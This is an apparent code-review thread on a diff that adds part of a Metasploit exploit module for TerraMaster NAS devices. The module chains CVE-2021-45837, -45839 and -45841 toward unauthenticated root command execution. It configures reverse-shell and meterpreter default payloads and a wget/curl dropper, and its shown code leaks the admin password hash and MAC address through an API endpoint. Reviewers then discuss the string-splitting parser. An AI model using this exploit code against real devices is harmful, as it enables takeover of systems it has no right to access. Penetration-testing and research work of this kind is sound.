modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb

```diff
@@ -0,0 +1,287 @@
+          Finally, CVE-2021-45837 is exploited to execute arbitrary commands as root by sending a specifically crafted
+          input to vulnerable endpoint `/tos/index.php?app/del`.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'n0tme' # Discovery and POC
+        ],
+        'References' => [
+          ['CVE', '2021-45837'],
+          ['CVE', '2021-45839'],
+          ['CVE', '2021-45841'],
+          ['URL', 'https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/'],
+          ['PACKETSTORM', '165399'],
+          ['URL', 'https://attackerkb.com/topics/8rNXrrjQNy/cve-2021-45837']
+        ],
+        'DisclosureDate' => '2021-12-24',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['bourne', 'wget', 'curl'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8181,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])
+    ])
+  end
+
+  def get_data
+    # Initialise instance variable data to store the leaked data
+    @data = {}
+
+    # Get the data by exploiting the LFI vulnerability thru vulnerable endpoint `api.php?mobile/webNasIPS`.
+    # CVE-2021-458439
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),
+      'headers' => {
+        'User-Agent' => 'TNAS',
+        'User-Device' => 'TNAS'
+      }
+    })
+
+    if res && res.code == 200 && res.body.include?('webNasIPS successful')
+      # Parse the JSON response and get the data such as admin password hash and MAC address
+      res_json = res.get_json_document
+      unless res_json.blank?
+        @data['password'] = res_json['data'].split('PWD:')[1].split("\n")[0].strip
+        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip
```

Comment:
Are you parsing json by using `split`‽

Reply:
The response is JSON, but the data field where all this information is stored is a string that I cannot parse as JSON.

Reply:
Maybe use a regex than, like `/"mac":"([0-9a-f:]+)"` to make it a bit more clear what format is expected/parsed then.